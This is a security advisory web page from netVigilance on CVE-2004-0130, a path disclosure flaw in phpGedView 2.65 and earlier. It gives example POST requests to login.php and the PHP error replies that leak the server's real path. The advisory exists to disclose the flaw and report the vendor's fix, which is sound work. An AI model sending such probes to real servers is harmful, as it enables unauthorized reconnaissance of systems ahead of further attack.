CVE Logo

 

 

 

Best Security Research

 »  netVigilance is an active contributor to nvd.nist.gov
 
 » Every vulnerability in our database is independently scored according to CVSS 2.0
 
 » Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
 
 »

netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
 

 » Our Professional Services team will validate any vulnerability Scoring for you.
 

netVigilance Security Advisory

 
 
 
 
PhpGedView Path Disclosure Vulnerability

 

 

*

Fact: More than 15 vulnerabilities were discovered EVERY day of 2009


Description:
login.php in phpGedView 2.65 and earlier allows remote attackers to obtain sensitive information via an HTTP request to login.php that does not contain the required username or password parameters, which causes the information to be leaked in an error message.

External References: 
Mitre CVE: CVE-2004-0130 
Securiteam Listing: unixfocus/5NP0M1PBPQ 

Summary: 
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). A security problem in the product allows attackers to gather the true path of the server-side script.

Release Date:
January 25 2004

Severity:
Medium

SecureScout Testcase ID:
TC 17865 (released Feb 6th)

Vulnerable Systems:
phpGedView version 2.65 and prior

Vulnerability Type:
Input Validation error - The login.php script is not testing if a variable which is supposed to be posted has been defined before using it.

Vendor Status: 
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem

Example:
I - Path disclosure

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA: action=login

-- HTTP Client Request --

Username and password are missing and will generate an PHP error message
displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>: Undefined index: username in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>: Undefined index: password in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>: Cannot add header information - headers already sent by (output
started at /var/www/phpGedView/login.php:36) in
< b>/var/www/phpGedView/functions_print.php< /b> on line < b>492< /b>< br />

-- HTTP Server Reply --

-------------------------------------------

II - Path disclosure with a valid user account

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login

-- HTTP Client Request --

Username/password must be a valid couple. The usertime is missing and will
generate an PHP error message displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>: strtotime() called with empty time parameter in
< b>/var/www/phpGedView/login.php< /b> on line < b>39< /b>< br< br /> < b>Warning< /b>:
Cannot add header information - headers already sent by (output started at
/var/www/phpGedView/login.php:39) in < b>/var/www/phpGedView/login.php< /b> on
line < b>44< /b>< br /> />

-- HTTP Server Reply --

Credits: 
Cedric Cochin - netVigilance Vulnerability Research team

 

back to Security Advisories 

 

Copyright©2004-2011,  netVigilance, Inc.   All rights reserved  • Privacy Policy

netVigilance©